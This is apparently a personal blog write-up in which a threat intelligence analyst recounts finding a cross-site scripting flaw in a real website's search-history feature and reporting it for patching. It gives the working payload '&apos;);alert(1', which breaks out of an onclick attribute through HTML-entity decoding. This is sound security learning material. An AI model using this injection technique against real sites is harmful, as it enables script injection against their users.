How I found my first Cross-Site Scripting Vulnerability

Shellbr3ak
3 min readMay 19, 2021

--

Hello all this is shellbreak, back again with another story of a bug I found apart from CTF challenges.

Since this vulnerability was found on a real website, I won’t be mentioning the domain on which I found it, so I’ll use https://example.com as a reference to the vulnerable website, so enough talking and let’s get started.

After I started working as a threat intelligence analyst, my boss knew that I’m interested in web penetration testing, and have some knowledge about it, so he asked me to test a website and look for a Cross-Site scripting, as there was a threat actor selling it on a black market, so he asked me to find it so we can patch it before any other malicious actors buy and exploit it.

In my first day, I started looking for input boxes to fuzz, then I found a search functionality that takes input from the user and holds the search queries in the response webpage as a search history. While scanning the website, I noticed from the Network scheme in the developers tools that there’s a file called xss.js being sent request to, so I viewed that JavaScript file, and it was 1200 lines of code.

At this moment, I was like, it’s impossible to find an XSS on a website that uses this huge code just to prevent XSS. However, I was like, it wouldn’t hurt to try.

So, I started deep-scanning the search functionality mentioned above, I started entering random values to see how the app is going to behave, I noticed that when I enter URL-encoded or HTML-encoded values, the app is decoding them.

Again, the search queries were getting rendered in the response body, in a “search history” section, so if a user decided to re-use one of them, they can just click on the newly added search query and a request will be sent to the server.

This is where I noticed that my input is being decoded (either if it’s URL-encoded or HTML-encoded).
I used browser’s developer tools to inspect those search queries, and they were added in <a> tags, with “onclick” attribute.

the “onclick” attribute’s value was something like “onclick=search_query(‘USER_INPUT’)”, so I left everything and started fuzzing again, to see how my input is going to be interpreted.

I entered some random values with single quotes to see if I can break out of the function’s context, but the app was encoding the single quote in a way similar to the quotes in this blog post (not like a single quote that’s used when defining a string in a code).

Then, I remembered, the app was decoding HTML-encoded and URL-encoded input, so I tried entering things like: “%27);alert(1” so the “onclick” attribute’s value would be like, “search_query(‘USER_INPUT’);alert(1)”, but that didn’t work, then I tried using HTML-encoded entities, so my payload was:

&apos;);alert(1

Then I submitted the request, and went to inspect the newly added <a> element again, and lucky me, the “&apos:” was decoded into a regular single quote that managed to break out of the function’s context, and “alert(1”
was placed exactly the way I wanted it to, and when I clicked on that search query from the search history (as I mentioned earlier, the injectable point was “onclick” attribute of the <a> tag), a pop up box showed up ;) .

I was happy as never before since this was my first XSS bug in real life.

Then I wrote a simple report and sent it to my team leader and contacted the responsible team to patch it :).

So, that was the story, I hope you guys liked it, and I’ll see you all in the next write-up.

--

--

Shellbr3ak

Offensive Security Engineer | Threat Intelligence Analyst | Cloud/Web App Penetration Tester | CTIA | eWPTXv2 | OSWE | CTF Lover